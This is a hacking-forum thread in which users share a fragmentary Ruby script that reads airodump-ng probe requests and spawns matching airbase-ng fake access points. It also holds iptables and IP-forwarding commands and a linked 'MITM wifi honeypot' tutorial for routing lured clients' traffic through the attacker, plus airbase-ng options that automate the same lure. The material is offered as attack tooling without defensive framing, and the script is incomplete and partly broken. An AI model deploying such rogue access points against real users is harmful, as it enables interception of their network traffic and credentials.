Jump to content

fake ap script... not like karma? its airbase-ng


Recommended Posts

karma was trouble to install on my machine, i didnt fill like booting bt... so here is a fake ap script... it will capture clients probe request and start a new esid...

#start airodump-ng wlan0 -w airbase
# this will simply scan airbase.csv file for client probe

@pid_list=[]# this will hold the list of running esids, "netgear", "freewifi", "cisco"
def refresh_list # read a airodump.csv file and sort threw clients
	block_1=block[146..cut] # here is your list of accespoints...
	block_2=block[cut+90..-1] # here is your list of clients 

	block_2.each_line{|x| buff<< x.split(",")[5..-1]}
		if not x==nil

			if not y.include?(":")
				if not y.include?("(not associated)")
						if z.size>=1
							if not @pid_list.include?(z)
							Thread.start{system("airbase-ng wlan0 -e \"#{z}\"")}


while true
	sleep 10


Link to comment
Share on other sites

Maybe some help setting up dhcp. I have nothing but problems with dhcpd3... maybe some simple alternatives.

Labtop has 2 wifi devices. Wlan1 is connected to droid 4g

Wlan0 will be airbase-ng so should I set ifcinfig at0 up ? also how would u configure dhcp

Link to comment
Share on other sites

i had to boot up kali to get a working example of a fake ap with dnsmasq...

simply follow this tutorial http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html

and dont forget to add iptables to complete your clients internet connection

wlan1 is established a connection to my droid hotspot 4g network... at0 traffic will now pass threw

iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

Edited by i8igmac
Link to comment
Share on other sites

  • 2 weeks later...

Cool script, but have you seen airbase-ng's -P option? My understanding is that it would do much the same thing.

From the web page (http://www.aircrack-ng.org/doku.php?id=airbase-ng):

-P All ProbesThis causes the fake access point to respond to all probes regardless of the ESSIDs specified. Without -P, the old behavior of ignoring probes for non-matching ESSIDs will be used.


-C SecondsThe -P option must also be specified in order to use this option. The wildcard ESSIDs will also be beaconed this number of seconds. A good typical value to use is ”-C 60”.
When running in the default mode (no ESSIDs) or with the -P parameter, the -C option can be used to enable beacon broadcasting of the ESSIDs seen by the directed probes. This allows one client which is probing for a network to result in a beacon for the same network for a brief period of time (the -C parameter, which is the number of seconds to broadcast new probe requests). This works well when some clients are sending directed probes, while others listen passively for beacons. A client which does directed probes results in a beacon which wakes up the passive client and causes the passive client to join the network as well. This is especially useful with Vista clients (which listens passively for beacons in many cases) which share the same WiFi? network as Linux/Mac OS X clients which send directed probes.
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...